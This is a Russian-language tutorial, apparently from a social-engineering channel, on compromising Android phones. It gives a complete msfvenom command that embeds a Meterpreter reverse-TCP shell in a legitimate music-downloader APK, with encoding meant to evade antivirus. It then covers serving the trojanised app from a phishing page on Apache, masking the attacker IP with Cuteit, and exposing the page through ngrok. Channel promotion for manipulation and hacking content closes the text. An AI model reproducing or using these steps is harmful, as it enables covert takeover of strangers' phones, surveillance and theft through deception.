Получаем доступ к андроиду через зараженный APK.

Для начала нам необходимо будет скачать какой нибудь APK файл не более 5 мб, для этого идём на 4PDA ищем там что нибудь подходящее и качаем, я использую софт для загрузки музыки из вк.

Теперь открываем терминал и прописываем:

msfvenom -x '/директория где находится файл который мы будем заражать/DownloadMusic-1.5.apk'  -p android/meterpreter/reverse_tcp LHOST=(ip вашего компа) LPORT=8080 -e x86/shikata_ga_nai -i 10 -o название итога.apk

-x - использовать такой то файл

-p - прилепить пейлоад

-o - назвать получившийся файл так-то

-e - зашифровать от обнаружения антивирусами

-i - количество "слоёв" шифрования

Жмём Enter и ждем когда веном либо выдаст ошибку либо скомпилирует файл.

Если выдает ошибку обновляем версию APKtool. Если не помогло ищем другую АПкашку для заражения. пишите если будут ошибки.

Теперь используя фишинг и СИ сделаем простенькую страничку для нашего софта.

Страничку можно создать используя конфигураторы сайтов либо использовать исходник приложеный ниже. Если вы используйте конфигуратор то знайте что он прилепит к ней вагон ненужного кода и прочий мусор.

Исходник ( Облако Mail )

pass - social_engineering

Содержимое папки Social по адресу /var/www/html (APK который мы заразили помещаем туда же)

Если не отобращается картинка то необходимо предоставить доступ пользователю для чтения и записи в папке www.

Открываем файл index.html при помощи текстового редактора и исправляем все надписи на нужные вам, в часности <a href="forgo.apk">Установить</a>

forgo меняем на название вашего файла.

В терминале пишем

 sudo systemctl start apache2

Как всё запустится открываем браузер, вводим в адресную строку свой ИП.

Для того что-бы наш ИП стал похож на веб адресс нам понадобится программа Cuteit которую мы скачаем с гитхаба

https://github.com/D4Vinci/Cuteit.git

там можно тупо следовать инструкции из файла readme

переходим в папку с кутитом через терминал и прописываем комманду

 python ./Cuteit.py ваш ИП например 123.15.46.54

Получаем такую картину:

Выбираем любую ссылку, вводим в адресную строку и попадаем на наш сервер.

Но в адресной строке в тот же момент появляется палево в виде нашего ИП.
Это мы победим при помощи Ngrok.

Прём по ссылке:

https://ngrok.com/download

Качаем, регистрируемся и следуя инструкции добавляем ключи, иначе не будет работать как нужно.

Когда всё готово через терминал переходим в папку с Нгроком и прописываем

 sudo ./ngrok http 80

   Наши рабочие ссылки в строке Forwarding

Готово.

Social Engineering - Канал посвященный психологии, социальной инженерии, профайлингу, НЛП, Хакингу, Анонимности и безопасности в сети интернет, Даркнету и все что с ним связано. Добро пожаловать ;-)

S.E.Book - Литература социального инженера.

@Social_Engineering_bot - Бот обратной связи.

1. Подмена буфера обмена.
2. Когнитивные искажения.
3. 5 способов отсылки полностью анонимных электронных писем.
4. Речевая стратегия. Ограничение выбора | Отрицание.
5. Изменяем IMEI в модеме Huawei или MiFi.
6. 7 простых и 7 сложных приёмов манипуляции сознанием. Какие из них используют на вас?